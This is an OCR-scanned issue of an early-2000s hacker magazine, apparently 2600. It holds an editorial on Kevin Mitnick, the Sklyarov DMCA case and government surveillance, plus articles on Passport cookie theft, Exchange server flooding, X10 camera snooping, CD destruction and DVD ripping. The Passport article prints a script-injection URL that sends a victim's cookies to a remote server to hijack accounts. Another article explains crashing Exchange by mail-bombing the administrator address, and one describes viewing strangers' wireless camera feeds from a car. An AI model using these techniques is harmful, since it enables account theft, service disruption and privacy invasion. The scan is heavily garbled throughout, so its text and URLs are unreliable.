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"Voice or no voice, the people can always be brought 
to the bidding of the leaders. That is easy. All you have 
to do is tell them they are being attacked, and denounce 
the peacemakers for lack of patriotism and exposing 
the country to danger. It works the same in any country." 
- Hermann Goering, Hitler's designated successor, 
before being sentenced to death at the Nuremberg trials. 
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In the fast paced culture that we seem to find 
ourselves caught in the middle of, it's very easy 
to get stuck in a default mood of euphoria or de- 
spair Lately it seems that we've been despairing 
quite a bit. We're certainly not alone. 

While it's very important to not lose sight of 
the bad and ominous things that are happening 
m the world of technology and what it could do 
to people like us, nothing is gained if we lose 
our overall positive outlook. We certainly 
couldn't have kept on publishing for nearly 
twenty years if we didn’t feel a strong sense of 
hope for the future. 

There will never be a shortage of negative 
issues to focus upon. Let's take a brief moment 
to look at the positive developments. 

By the time you read this (and hopefully bar- 
ring any last minute unfortunate circum- 
stances), the excruciatingly long ordeal of 
Kevin Mitnick will have finally reached an end. 
January 20, 2003 w as the date that Mitnick’s su- 
pervised release came to an end - three years af- 
ter his release from prison. That means that he 
will once again be able to use the Internet, travel 
without having to ask permission, and talk to 
anyone he wishes to without having to check to 
see if they've ever been convicted of a crime. 
Most oi us take these freedoms for granted so 
it’s hard lo even imagine what life must be like 
without them. 

In these past three years. Milnick has be- 
come a model for someone who can overcome 
adversity and triumph in the end. Despite five 
years of isolation and the aforementioned re- 
strictive conditions upon his release, he refused 
to lei the system defeat him. The authorities 
made it almost impossible for him to earn a liv- 
ing - insisting that he not be allowed anywhere 
near a computer and atone point suggesting that 
he pursue a career in fast food. Instead Mitnick 
landed a job at a major talk radio station and an- 
swered listener questions about technology. He 
had kept himself educated on all the technologi- 
cal advances, despite being incarcerated and 
forbidden from experimenting with them upon 
his release. More recently he had a book pub- 
lished on the intricacies of social engineering 
and wem on a government-approved speaking 
tour to promote it. Throughout this, Mitnick 


found time to testify before a Senate subcom- 
mittee on the dangers of bad technology and un 
informed people. He also provided key 
evidence in a case against Sprint who had the 
audacity to claim that their switches were 
uohackable. 

It would have been easy to dwell on the neg- 
ative in this case - and there certainly was in> 
shortage of negativity. After all, Mitnick hadn’t 
actually had a real day of freedom since 3988 
meaning that when all is said and done, fifteen 
years will have gone by since this ah started. 
And in all that lime, there was never a charge 
filed against Mitnick of anything more substan- 
tial than making free phone calls and looking at 
source code that didn't belong to him. It w as all 
ail incredible waste of time. But we get nowhere 
by letting our bitterness dictate how we live. We 
have everything to gain by continuing forward 
in our spirit of curiosity, education, and 
rebellion against conformity. 

There's always a price to pay in order to take 
those steps and sometimes it's a heavy price. 
Dmitry Sklyarov spent Lime in an American 
prison and was unable to return to his native 
Russia for nearly six months - simply because 
be wrote a program that could be* used in a way 
that violated the absurd Digital Millennium 
Copyright Act. ft made no difference that he 
wrote the program in another country. Even 
Adobe, the company that originally pressed 
charges against Sklyarov, realized how ridicu- 
lous the whole thing was and tried to drop it. 
But it was too late and the American justice sys- 
tem wen! to work, eventually putting Sklyarov's 
company (Elcomsoft) on trial instead in ex- 
change for his testimony. The authorities didn't 
count on the defendants putting on a strong fight 
and they didn't count on the massive show of 
support for Sklyarov. 

There's a reason so few cases ever make it to 
a jury. People are rightfully terrified of the sys 
tern and what it can do to them. It s ironic that ii 
took someone from outside our country to stand 
up to the system and refuse to be intimidated. 
The trial took place m December and it only 
took the jury one day to rule in Sklyarov's and 
Elcomsoft's favor. 
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Part of the DMCA stipulates that there has to 
he intent and this was something the jury w'as 
unable to hnd in this case. It doesn't address the 
overall stupidity of the law itself which means 
there will be more such cases. But it’s a good 
sian and a significant step towards fixing the 
numerous problems caused by this horrible leg- 
islation, And most importantly, it's proof I hat 
determination and standing by one s convictions 
can ultimately lead to victory. 

We have to also remember that there's a big 
world out there, one that doesn't always initially 
grasp the importance of the issues we value. It's 
easy to dismiss the general public as ignorant 
and pawns of the mass media. But. as in all 
things, the truth is never quite that simple. The 
general public can get it, they do tend to value 
the things that we do, and they are most defi- 
nitely not the enemy, fhe jury in the Elcomsoft 
case is living proof of this. The key is getting 
the message out. 

Over the pasL year or so we've reported 
(along with many others) some of the really bad 
ideas that have been passed down from Capitol 
Hill as a "response" to terrorism - things like the 
Patriot Act, the Homeland Security color 
scheme, Operation TIPS, Total Information 
Awareness, etc. And while many of these things 
are still around, public awareness and public 
criticism has soared - and it’s most definitely 
made a difference. 

People are taking more time to think these 
things through and more of them seem to be re- 
alizing that diminishing our freedoms really is- 
n't going to accomplish a whole lot - other Than 
diminishing our freedoms, Weve seen less talk 
of the alert siatus color coding system as it 
becomes mocked more than it’s used. 

The TIPS system was heavily criticized for 
its Stasi-like system of informing on ones 
neighbors and having untrained civilians prowl- 
ing around looking for potential though tcri me. 
And in true Orwellian style, all mention of TIPS 
was removed from the citizcncorps.gov website 
where it had been prominently featured. It never 
happened. 

The Total Information Awareness initiative 
is still very much with us. In their own words, 
TIA is meant to be a "total re invention of tech- 
nologies for storing and accessing informa- 
tion... although database size will no longer be 
measured in the traditional sense, the amounts 
of data that will need to be stored and accessed 
will be unprecedented, measured in petabytes." 
All of this will supposedly identify terrorists by 


having every conceivable bit of data easily 
available - from medical records to credit card 
purchases to Internet activity. It doesn't take 
much lo figure out that since they don’t know 
who the terrorists are they will have to scruti- 
nize all of us using these yet to he invented 
tools. It's clearly a sensitive topic lor the folks at 
Defense Advanced Research Projects Agency 
(DARPA) who won’t even reveal how much 
money is being allocated for this. While public 
pressure lias yet to kilt this beast, its probably 
one of the few things I hat can. Public ridicule 
has already put an end lo the TIA logo - a pyra- 
mid with an all seeing eye within it, apparently 
looking out over the globe. That also never 
happened. 

As wc go to press, yet another monitoring 
plan is being announced - this time one that 
makes Carnivore look friendly. It s part of a re- 
port entitled Tl Fhe National Strategy to Secure 
Cyberspace" and it would require Internet Ser- 
vice Providers to participate in a centralized 
system that would theoretically allow the entire 
Internet to be monitored along with its users. 
The apparent frustration the government is feel- 
ing is summed up in this statement by one of the 
plan’s coordinators: "We don’! have anybody 
that is able to look at the enti re picture. When 
something is happening, we don'i know it s hap- 
pening until ifs lex) late.” That is why the plan 
will fail. What they want is not only impossible 
but it flies in the face of everything Lhe net rep- 
resents. ll would be the equivalent of wiretap- 
ping everyone at all times and we suspect most 
people just aren’t going to go for that. Expect a 
backlash on this like nothing we've ever seen - 
if this scheme even makes it to spring. 

Absurd and ridiculous as some of these 
plans may be, it’s no excuse for not remaining 
vigilant and fighting those who endanger our 
freedom. Our victories may appear to be few 
and far between but they are quite significant 
As is the fact that none of them could have been 
accomplished without a degree of organization 
and activism. Whether the cause is ending the 
suffering of a single person, overturning a really 
bad law T or preserving everyone’s right to pri- 
vacy, reaching out to like-minded individuals 
and helping to make it a major issue is critical. 
It s gotten us this far and it will continue to be 
our strongest weapon. 
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by Chris Shiflett 
ch r is @ shifletLo r g 

This article is a follow-up article to 41 Pass- 
port Hacking," an article published in 18:3. 
Much of the information here is given under 
the assumption that you are familiar with the 
original article, so you should read it first. The 
original article was the first to reveal the secu- 
rity vulnerability in Microsoft Passport that 
prompted Microsoft to discontinue the Passport 
service for a short period of time while im- 
provements were made. Other articles have ap- 
peared since the original, and U has been 
translated into several different languages, Un- 
fortunately, the Passport mechanism possesses 
the same fundamental flaws that it did when the 
original article was written, though attempts 
have been made to mitigate these risks by im- 
posing shorter timeout periods and requiring 
users to re-authenticate themselves more often. 

Background 

In "Passport Hacking," I introduced the Mi- 
crosoft Passport mechanism and its inherent in- 
security characterised by a complete 
dependence on cookies. Though cookies can be 
an adequate means of maintaining state in 
HI TP transactions, they are a poor choice for 
user authentication. Using cookies and URL 
variables, Microsoft communicates with Pass- 
port enabled sites through the user alone; there 
is no server to server communication. This is 
the fundamental design flaw that exposes Pass- 
port users to all of the security vulnerabilities 
that have been published to date. 

Hie vulnerability used to compromise a 
Passport account in i he original article involved 
using a malformed URL to expose a users 
cookies to an unauthorized website. This vul- 
nerability only existed in Microsoft InLernet 
Explorer versions 4,0 - 5.0, so this technique 
could not be used to compromise the Passport 
account of people using Internet Explorer ver- 
sions 5,5 and 6,0. This article will demonstrate 
a technique (hat can be used to compromise the 
accounts of people who use these newer ver- 
sions of Internet Explorer and will direct Inter- 
net Explorer users to the patch that will fix this 
vulnerability. 


The Vulnerability 

The vulnerability that exists in Internet Ex- 
plorer versions 5.5 and 6,0 was originally a I 
luded to on the web at http://www. solution s- 
. li/i nde x .eg i/ new s _ 200 1 _ 1 1 _08 ?l ang =eng , I a 
order for a website to gain unauthorized access 
to a user's cookies, an about: URL is used to de- 
ceive the web browser so that h executes client- 
side scripts in the local context with regards to 
security restrictions. Thus, a client-side script 
can potentially have as much access to your 
computer as you do. 

An example of a URL exploiting this vul- I 
nerability is the following; 
ah* >u t ://<sc ri pt %20 lung a a gc= j a vascri pt >a I ert( Th i s 
% 20brow ser% 2()i 20v u I neru hie / )</script> | 

A vulnerable browser will execute this 
client-side script, which will display the fol- 
lowing alert box: 



The significance of this is more extreme 
than this example illustrates. Because Internet 
Explorer executes this client -side script in the 
local context, this script has fewer security re- 
strict ions than client-side scripts that Internet 
Explorer believes to be sent from a remote web 
server In addition, we can make a simple mod- 
ification to our URL to make the domain cheek- 
ing mechanism in Internet Explorer mistake the 
URL for one from any domain we choose when 
it checks for cookie restrictions. For example: 
abou t :// w w w. pas s pt m .Co m/<sc r i pt% 201 a ngtiuge -j 
a va sc ri pt>a 1 e rt t doc u mem coo k t e K/sc ri pt> 

If you are currently logged into Microsoft 
Passport when visiting this URL, an alert box 
similar to the follow ing will appear: 
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MSPPre«p3£SPD[t@k3ab^ orq. Browse*! est Success?; 

MSRAuth*5T CH 22BZXDFSwY7!1 CE iq5B i?aM t£ 1 TW^SHNBqVAtvsWFWbOC&^na* J S wlwG tarvM aSSfl^JpOX vqpfc 
FStTdbhQtft 

MSPProt»5T CH 22BZXB' WQ zkqrnJ bOeIXE sQtnriQ T araQJ qQ iqiARjAVT 0 vM mTM hKQflZRomtXvUZSVLO KWtJl £pl3 
Dei pHblBY gi3J pJ F'pB zD xvJwdoSV.tMS ei.Vf 3taU L ghgSByez? OqpZpD' WN [pvv4i*FHkfl5M' voSNzuvKIi KJ U Xril IE qflgYoZk 
% MSPV»*3 


All cookies that would be made available to a 
server-side script in the www, passport.com do- 
main will appear in the alert box. The signi he a nee 
of this example is that we now have a technique 
for executing a client- side script that has access to 
any cookies from any domain we choose. When 
combined with Passports complete dependence 
on cookies, the danger should be clear. 

The Compromise 

The only step remaining fora complete com- 
promise is to establish a method to gel the cook- 
ies sent to the web server where they can be 
stored and subsequently retrieved by the im- 
poster, To do this, I w ill use a URl similar to the 
last example, except that the script will redirect 
the user to a remote URL and append the cookie 
data in the query siring of that URL: 

a bou t ://ww w. passport , c o n i/<scri pi L 201 an 
g uage=ja vase ri pt>doc u men t doc at i o n='http : //shi - 
flett.org/de mos/passport_h acking_re v is ited/?coo 
ktes=’+docu meni.cookie</scri pt> 

The most dangerous Characteristic of this 
technique is that no interaction from the user is 
required. Because of this characteristic, an at- 
tacker canned inect the user through many URLs 
that will compromise the cookies from many dif- 
ferent domains rather than just one. This makes 
Internet Explorer versions 5.5 and 6.0 even more 
dangerous than the previous versions with re- 
gards to cookies, hi addition, tins compromise is 
even easier to achieve than the original, requiring 
very little expertise on the part of the attacker. 
Once the cookies are stored on the web server. 


a technique must be established to store these 
cookies on an imposter's web browser. Many 
methods can be utilized for this step, and the orig- 
inal article gives sample code for one. This Itnal 
step will complete the impersonation, and the im- 
poster can then pose as the user whose account 
was compromised by visiting any Passport 
enabled website. 

Summary 

Due to the fundamental Haws in the design of 
the Passport mechanism, I do not recommend that 
it be used in conjunction with sensitive data os 
personal information. The convenience is not 
worth the security riskv and it is likely that this 
article does not represent the last of such risks. As 
1 mentioned earlier, the mechanism used is fun- 
damentally flawed; articles such aa this merely 
describe techniques that can be used to exploit 
these Haws, 

For those who are currently using a vulnerable 
Web browser and wish to continue to use it. visit 
hltp://www,microsoft. com/window s/ieAlo wn - 
loads/critieal/q3 1 3675/defauU.asp and install the 
Security patch. There are many websites that uti- 
lize cookies in order to maintain state, and using a 
vulnerable browser places you at risk of many at- 
tacks similar to the one described here. 

An interactive demonstration of the technique 
described in this article is located at lutp://shi- 
flett.org/de i n o s/ pas s port_hac ki ng _re v is i ted/ . 


Lazy Exchange admins 


by ddShelby 

Security in Exchange is or should be a con- 
cern for many admins out there because of its 
fairly widespread use in many small to mid sized 
organizations. It does have some worthy Features 
but also has some serious security concerns ( like 
everything from Redmond J that need to be at- 
tended to. And that is the purpose of this article. 
To inform and educate those who read it and 
maybe expose a few Exchange admins to some 
information they might lind useful. So let's get 
started. 


As an admin you have the ability to create an 
account during install that is not the same as the 
default administrator account in the OS, But not 
many elect to do this because of the log on/log off 
hassle to administer the OS along with a separate 
account to administer Exchange, If a separate Ex- 
change admin account was not created at the time 
of install (which is almost always the case) and 
it’s an NT4 server, then it's almost guaranteed that 
adminislrator@whoever.com exists, because you 
can't rename the administrator account for the OS 
in NT, If it's a Win2K server with Exchange 5.5 
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or Exchange 2000, the same is also true. But with 
the ability to rename the default administrator ac- 
count iii die OS, there is a chance it was renamed 
at the time ot setup. In both cases (assuming de- 
fault! the administrator account for the OS has an 
SMTP address that follows the convention: ad- 
ministrator^ 1 whoever.com, If the OS is NT4. 
then it's a shoe- in unless the SM TP settings were 
edited by the admin. This is the problem. 

Some Basics of Exchange 
The standard version of Exchange 5.5 and 
2000 both have a limit on the size of either the 
public or private database tpriv.edb and pub.edb). 
They cannot exceed 16 GB each, t he Enterprise 
versions of 5.5 and 2000 tire not limited to any- 
thing except available drive space. With server 
drive space still somewhat costly (assuming the 
server runs with some form of SCSI and raid), 
reaching this limit is not difficult for most organi- 
zations of a dozen users or more. Two reasons 
why ifs so easy to get to 16 GB or reach the 
servers available drive space limit is the disre- 
gard of most admins towards limiting users' mail- 
box size and the users' habit of using Outlook 
deleted items folder as an archive folder. The ad- 
min has Lhe ability to force notification limits on 
users' mailbox size on either a global or per user 
basis, l he spam issue is also partly to blame since 
everyone just deletes it, but the mentality of using 
the deleted items folder as an archive comes back 
to haunt again* only adding lo the total size of the 
database. So the 16 GB limit is in many cases 
closer than one might think. This is especially 
true if none of the limits were ever put in place 
and the server has been in use for a year or longer. 
It's made worse by Lhe fact that small organiza- 
tions don't need a monster server to run Exchange 
5.5 and with the hardware requirements set forth 
by Win2K server* many have elected to stay with 
NT4 and Exchange 5,5, An NT4/Exdmnge 5,5 
server could easily serve a dozen users on a F200 
with 32 megs of ram and a single 10 GB IDE 
drive. Don't laugh. I ve seen it. 

Gening back to the point* Any Exchange 
server is vulnerable to getting swamped and not 
by some new hack. You can crash Exchange by 
simply knowing any e-mail address of any recipi- 
ent on any given server. The ugly part is this 
could potentially happen over days or weeks or 
even months before it's even noticed or it's just 
too late. Since Exchange by default has an ac- 
count assigned to the Administrator of the OS, an 
SM T P address exists for it. If you assume that the 
administrator account is not actually in use but 
still exists* one could theoretically swamp an Ex- 
change server by sending numerous e-mails with 
large bogus attachments. Or if the sender's ISP 
does not impose limits on the size of outgoing 


mail, one large attachment could do the same. To 
use any general user's address is slightly more 
difficult since users usually read their mail. But 
the administrator account is almost never used 
since admins set up an address for themselves an ! 
use it instead. 

As drive space comes close to zero available, 
the Exchange service that handles SMTP (IMS) 
shuts down and all incoming mail is rejected, Bui 
since the information store service (the database) 
usually continues to run, and if the admin is smart 
enough to check the private information store 
listed in Exchange Admin, he would see the 
tremendous size of the mailbox and then just log 
into it and clean it out. An easy fix for Lhls is to 
just edit the SMTP address of the administrator 
account to something ohscure* In addition, you 
could disable any unused SMTP addresses to help 
prevent getting swamped. A periodic check of 
available drive space or the size of (he .edb files 
would be useful, but seems to escape many 
admins. 

But Wait, It Gets Worse 
As opposed to reaching the drive space limit, 
il the 16GB database limit is reached instead, it 
becomes a whole different story* If the Enterprise 
version is installed before the 16 GB limit is 
reached* then disaster can be avoided* However, 
d the 16GB limit is reached before upgrading, the 
information store service is shut down automati- 
cally and can't be restarted The result from this 
is all incoming SMTP messages are rejected at 
the server and no user can log in to their respec- 
tive mailbox. And lhe admin can't get the service 
started to log in and delete the offending content. 
As an admin you can purchase the Enterprise edi- 
tion for two grand* hut installing it on top of lhe 
standard edition doesn't quite solve the problem 
All is not lost - there is a workaround for this 
listed in the Knowledge Base that explains how to 
copy the database into the active folder (usually 
exchsrvAM DBDATA) after you install the Enter- 
prise version. But if lhe database has reached the 
16GB limit you'll be copying for a while. If the 
admin is savvy enough, he could play the game of 
just renaming folders instead of copying. But 
with so many Windows admins who changed ca- 
reers from grocery bagging, it's unlikely they're 
smart enough to figure that out. And as the 
Knowledge Base article suggests to copy the edb 
file* it seems to me that at least one employee at 
Redmond didn't figure it out either. Admins could 
also defrag the database with a utility included 
with Exchange in the exchsrvr\bid folder called 
eseutil (both 5*5 and 2000). This would buy 
enough time to delete enough and recover. But il 
the SMTP service IMS is running and email rs 
still incoming, it could be a race to delete before it 
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reaches its limit again. In addition, Lhe delrag 
needs drive space equal lo or greater than the size 
of the database* But this inevitably brings me 
back to admins who were bagging groceries six 
months ago. Another safety net would be to im- 
plement a second MX record for the domain with 
a higher cost route, so any incoming mail rejected 
by Exchange would be collected on another ma- 
chine. Then with ETRN you could dequeue the 
mail from Lhe higher cost server and no mail 
would be lost. 

Discovery of a Server 

Regardless of the presence of a firewall, by 
using one of the many port scanners an Exchange 


by Particle Bored 

Are you having a hard time figuring out what 
to do wiLh your X 1 0 camera now dial you are 
done playing practical jokes on friends and fam- 
ily? For less than $50 you can pul the X10 re- 
ceiver in your car and begin screwing around 
with complete strangers* 

Standard disclaimer: I don't accept responsi- 
bility for my own actions* so l definitely won t as- 
sume responsibility for yours, If TVs in vehicles 
are illegal in your area, or should you get decapi- 
tated from a TV Hying around in your ear it's your 
problem. 

Here is what you will need to get started: 
Jensen J53-RW TV/Monitor (only $25 at Target) 
KI0 Receiver 

DC Power cord with "f," connector 

DC Power "Y r adapter 

Velcro 

The Jensen TV is a 5" black and white 
portable monitor that has both video and audio 
RCA input jacks. It can run on AC* DC, or batter- 
ies and comes w ilh a car lighter adapter. 

The X 1 0 receiver is intended for indoor use, 
so it is shipped with only an AC adapter. If you 
look at the output of the adapter though, you'll see 
that it is 12 volt i >C which means you can run the 
receiver straight off your car battery. Since 1 
wanted the system to he easily removed, I de- 
cided to power it with another lighter cord (the 
one with the "L" connector). It is positive- tipped, 
so make sure you have the polarity right* 

Now plug everything together* Nearly all of 
the connectors can only go in one place. The 
RCA connectors are fully color-coded, so if you 
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Win2K laptop but many oLhers work just the 
same, A scan of a range of addresses to port 25 
will eventually reveal an open port. If it's an Ex- 
change server it will identify itself as such* as 
well as the version and build. For example, 25 
S M fit ' 220 sc rve r. do ma i n . w hoe ver. co m HS M T P 
Server (Microsoft Exchange Internet Mail Ser- 
vice 5*5.2653.13) ready. In this example it's a 5.5 
SP4 server. With that, the domain is known* the 
administrator address can be correctly assumed 
95 percent of the time or belter, and the rest is up 
to any delinquent with nothing better to do. Or at 
some point some worm will make its way to the 
Internet and play this same game, only faster* 


can't figure out how to do it, lire up the IM client 
on your Mac and ask your grandmother. 

I mounted the monitor and receiver on my 
dashboard with Velcro. If this method obstructs 
your view you can put the monitor on the passen- 
ger scat or floor. Make sure you don't mount any- 
thing where it might hinder the deployment of an 
airbag. 

Now hit the road. 1 found my first camera 
within 61) seconds on the very next block. 1 
typically find one about every 15 minutes. 

In closing here are a few things I learned the 
first day: 

- Don't worry about the channel switch on 
your receiver - most folks leave it on the default 
channel "A‘\ 

- The transmitters have a range of only around 
100 yards so you w ill need to be somewhat dose 
to your target. 

- You'll lend to get audio before video* so 
you'll know you are onto something when the sta- 
tic on Lhe TV goes away* Keep your eyes tin the 
road and pull over when you start receiving 
audio, 

- You'll notice several definite patterns appear 
on the monitor at times* For example, I have seen 
both narrow and wide horizontal lines* If you 
identify the devices that cause them* write to the 
Letters section of 2600 and let everyone know. 1 
would bet one of them is a 2*4 GHz cordless 
phone,.*, 

- I was able to get perfect cable TV twice. Is 
someone using wireless for extensions or 
something? 


server is easy Lo find, i use Super Scan on my 
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by Gr3y I0qu3 
gr ey loq ue @ pa l a d indesi gn ,ca 

While we as hackers have an obsession wilh 
freedom of speech we also have an obsession 
with dal a de struct ion. 1 wrote this article to quell 
my - and many other peoples' - interest in the lat- 
ter specifically dealing with CDs, I've heard 
nuking the CD in a microwave is not MX) percent 
successful in destroying the data 11 was stated in 
"How to Hack From a Ram Disk" in 18:4. I tried 
to find information on this topic but there really 
is none out there, so 1 decided to take this task on 
for myself. 

When 1 started doing research for this article J 
realized that there are many ways to destroy CD- 
ROM. CD-R* and CD-RW media. The first 
things l found were targeted towards commercial 
uses, I found products that used "micro indenta- 
tion H " to "reliably penetrate the data surface of 
target media, destroying any readable daia" and 
as a side effect the CD went from round to an 
oval shape Sure sounds good, right? Well if you 
have $5k to waste it’s great. Then there's some 
i hat grind away the recording surface. The one I 
found cost $1GL Both of these solutions are not 
priced for the average person. Simply deleting 
the filev from a CD-RGM/R/RW won't work ei- 
i her, There are plenty of software suites out ihere 
for recovering data from them. 1 found one for 
$39,95 and there was even a free 30 day trial. So 
if you have a low tech adversary you're hiding 
the data from even that wouldn't work. The soft- 
ware can also recover data from quick formatted 
CD-RWs, where the data is left there just to be 
overwritten at a laier time (the same concept as 
recovering deleted data from your hand drive - 
the reference to the data in the drive table is re- 
moved. the data isn't touched). Let's gel to ihe 
main point of the article: Does data destruction 
with a microwave really work? 

First, to understand if the microwave is an ef- 
fective way to destroy data you need to under- 
siand how CDs are made. All three types of CD 
f C D - RO M * CD- R, a n d CD- R’ W ) are d i IT ere ni. In 
the next little while I'm going to look al the three 
different types and explore if it will work for 
each. 

CD-ROMs are exactly what they say, CDs 
with Read Only Memory, Most of a CD-ROM 
consists of a piece of dear polycarbonate plastic. 
During manufacturing, this plastic is impressed 


with microscopic pits arranged as a single, con- 
tinuous, extremely long spiral track of data. Once 
the plastic is formed, a thin, reflective aluminum 
layer is 'sputtered" onto the disc* covering the 
bumps. Then a thin acrylic layer is sprayed over 
the aluminum to protect it. A CD reader reads 
CD-ROMs by sending out a laser beam that 
passes through the plastic layer, reflects oft the 
aluminum layer and hits a device dial detects 
changes in the amount of light it receives, I he 
bumps, commonly called pits because if you 
could see them they would look like pits from the 
label side of the CD-ROM, reflect the light dif- 
ferently from ihe lands. The lands arc ihe rest of 
the aluminum layer. The aluminum layer is very, 
very thin* When you nuke a disk, large currents 
flow through ihe aluminum, These currents pro- 
duce enough heat to vaporize the aluminum. You 
then see a very small lightning storm as electric 
arcs go through the vaporized aluminum. There 
will be many paths left etched through the alu- 
minum after this. So with the aluminum vapor- 
ized a CD player won't be able lo read the data 
anymore. Because of the extreme heat of the alu 
milium the plastic above and below the alu- 
minum would also be damaged. I'd he guessing 
the aluminum paths left would be horribly 
warped. Just think about what w r ould happen to 
you if you were subjected to l hat kind of heal 
I'm fairly confident that this is a 100 percent se- 
cure method of data destruction as you would nul 
be able to somehow inject a new reflective mate- 
rial and fill up i lie microscopic pics as they would 
he damaged. Sure, l hat's all great if you happen 
to have a Wrndoze CD silling around that you 
don't w ? ant anyone to have to experience the 
horror of. 

So what about CD-Rs? Instead of ihere being, 
pits imprinted into the plastic of a CD-R there is 
an extra layer. This extra layer is a greenish dye 
righi below the reflective material. A write laser 
heats up the dye layer enough to make it opaque. 
The read laser in a CD player senses the differ- 
ence between dear dve and opaque dye the sami 
way it senses bumps - it picks up on the diffei 
ence in reflectivity. So when you nuke a CD-R 
the gold/aluminum layer vaporizes. If that is flic 
only effect then it would be possible to cut the 
CD where the aluminum/ gold layer used to lx* 
and then put a reflective substance on top of it 
and stick it in a CD player. This would require 
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very, very fine instruments as a CD is only 
1.2mm thick. But the main variable is how hot 
the aluminum/gold is w hen it vaporizes and if it 
is hot enough to change the state the dye is in - 
from transparent to making the whole disk 
opaque to a reader. From looking at a few nuked 
CD-Rs t think that most data would be lost. On a 
blank CD that is nuked, there is a "loose swirly 1 ' 
pattern of the different shades {written and un- 
written ), effectively making true data impossible 
to find. On CDs with data it would do the same 
and so a lot oJ data would lx 1 lost. So on CD-Rs 
it's not really a guaranteed process of having 
your data fully and completely removed. Al- 
though if you're up against someone like the 
NSA/FBI/C1A who are going to all ihe trouble to 
find that information you have far bigger prob- 
lems on your hands and I'm guessing you'd never 
see a public court, 

CD-RWs are a little different again. Instead 
of the dye layer there's a phase-change com- 
pound composed of silver, indium, antimony, 
and tellurium. This recording layer is sand- 
wiched between dielectric layers that draw ex- 
cess heat from the phase-change layer during the 
writing process, A CD-RW drive has to use three 
different lasers: a read laser, a write laser, and an 
erase laser. To write to a CD a laser beam heats 
areas of the phase-change material above the 
melting temperature (50O-70OC). so all the atoms 
in Lhis area can move rapidly into a liquid stale. 
I hen, j I cooled quickly enough, the random liq- 
uid slate docs not reorder its atoms back into a 
crystalline state. To erase, a laser heats the same 


area to above the crystallization point - 200C - 
and then lets it cool quickly so that the atoms re- 
order themselves. The read laser is much less 
powerful The dielectric layers that are above and 
below the phase-change compound are by defini- 
tion "poor conductors of electricity and w ill sus- 
tain the force of an electric field passing through 
it." So that would not allow much of the electric 
field caused by the microwave to be able to reach 
the phase-change compound layer where the data 
is stored. Bui then again, it's riot made to stand 
the bombardment by a microwave. Also, its a 
heal insulator so the temperatures caused by the 
reflective layer vaporizing will not affect it too 
much either. So again with advanced tools it 
mighL be possible to remove the damaged 
material and put on a new reflective layer. 

Unfortunately I have no way to find this out 
for sure. 1 would like someone to write a follow- 
up to this article with actual Lab data (Univer- 
sity). As you can see it is not known if 
microwaving is a 100 percent secure form of data 
removal tor CD-Rs and RWs. Il is one of the 
most secure options ihere is. It should hold up 
unless you have POTUS (President of the United 
Stales) really pissed off at you. Local police 
agencies and the FBI probably do not have the 
technology to retrieve daLH from a nuked CD. 
Most of the people who argue that this is possible 
also argue that "they" would just go back in time 
to before you nuked the CD.... 

Greetz: Spiff y and Syphet: 


BANKRUPTCY SERVICES U.C. AS 
CUSP AGENT FOR PSINET LIQUIDATING LLC 


HSBC BANK USA 
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Some of you may remember a problem we had with a company called PS I back in 1995. To put it 
briefly, we were misled into signing a contract for ISDN service that didn't exist arid almost lost a 
sizable down payment Once we publicized the situation and stuck audio evidence of their deceit 
on our website, we got a refund in full. More recently, PS! went bankrupt (and no, we don't feel 
guilty). For some reason we wound up on their list of creditors and eventually received this check* 
They also managed to rename us from 2600 to 5393* We doiTt really understand any of it but if 
this is how they ran things, we may understand how they went bust. 
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How to Make a DVDfi 


by Maniac Dan 

Disclaimer: Copying DVDs to sell or DVDs 
you &o not own is illegal and immoral and 
should not be done . 

After reading the letter in 19:3 questioning 
the methods of DVD copying, l decided to write 
an article detailing exactly how it's done, or at 
least get it close enough for normal people to 
make backups of their DVDs, I've only tested 
this on Region l NTSC DVDs. Readers in other 
countries should find a guide for their region 
and video formal. Sorry. 1 also find it useful to 
bring a stack of VCDs w ith rue on trips, since 
my laptop dt^sn't have DVD capabilities. Any- 
way, I'm going to detail the methods for ripping 
to either AVI, VCD. or SVCD. Some of the 
steps are the same, hut for steps that are differ- 
ent, I will assign them both a number and a let- 
ter. so 3(A) is the AVI instructions, 3(V) is 
VCD, and 3(S) is SVCD. Any step that applies 
to all three formats wall have no letters. In order 
to rip to AVI, you need Smart ripper and 
DVD2AVL To rip to VCD and SVCD, you need 
these files plus TMpgEne and BEJMpeg. Also, 
for the ripping process to work on XP or some 
versions of 2K, you need a valid aspi layer dri- 
ver. To bum your CDs you need soil ware that 
supports VCD and SVCD burning, like Nero. 
(Links for these programs are the end of this ar- 
ticled Now for the steps: 

I: Insert the DVD and play it for a few sec- 
onds in a software DVD player. This will "un- 
lock" the DVD and allow you to rip it using 
Sniartripper. 

2: Load up Sniartripper and take a look 
around. At the bottom of the screen is a "Target" 
box which needs to be filled in with a valid 
folder name. The rest of the first page is chapter 
selection for if you only want to rip certain 
scenes (like Monty Python sketches). The sec- 
ond tab is called "Stream Processing" and al- 
lows you to select the languages and special 
tracks you want ripped. I usually just rip them 
all and then only convert ihe English track, but 
if you're hard pressed for drive space, then cut 
out what you don’t want. Next, click the settings 
tab. Under settings, 1 recommend setting key- 
check to "Every VOB File" and filespl tiling to 


’Max Filesize", Now set the max-file size u 
] 0,000MB (lOgb). This way the movie will he 
ripped to one big file on your hard disk. (Want 
ing I This is only possible wilh NTFS, If you 
have a FAT file system, set max-filesi/c lo 
4,000MB,) I 

3: Click start and wait until the DVD is 
finished. It shouldn't take more than an hour. 

4: Fire up DVD2AVL Once again, I recoin 
mend taking a look around the program be fort 
blindly trying to follow my steps. Go to file 
jopen. A blank box will appear with three but- 
tons on the left side. Click "Add" and add the 
lile(s) you just ripped to the box, then click OK 

5: Press F5 to make sure the movie tool 
OK and (he VOB files arc in the right order. You 
wilt not have audio and the video will be East, 
This is normal Make note of the aspect ratio OQ 
the box that pops up along the righL side. You 
are almost ready to convert to either AVI or 
d2v/wav. Check your menu settings. For audio! 
Track number should he "I", channel formal 
should be "Auto", Dolby Digital should be M Do 
code", MPEG Audio should be "Demux", ami 
48- 144, l should be off. Video settings should bn 
left alone, 

6(A): AVI users rejoice! This is the last su p 
for you! Go to file-]save AVL pick a filenunu 
and location, and click "Save 11 . Now a box pops 
up asking you to select your preferred video 
compression method. Choose your poison il 
recommend DivX 5.0.2) and click OK, then su 
back for a few hours while it converts. If the 1 
is too large, find an AVI splitter out there. I’ve 
heard AVlChop is good. 

6(VS): VCD and SVCDs need a few' morel 
steps. Still in DVD2AVI, click file-jsave pro 
ject. Name the project and click "Save". It will 
run through Ihe movie file once or twice and 
then beep when it finishes. This process should 
take less than the ripping process, but it depend* 
on your processor. Once it’s done, write dow n 
the contents of the "Aspect Ratio" and "Video 
Type" boxes. We need that informal ion i 
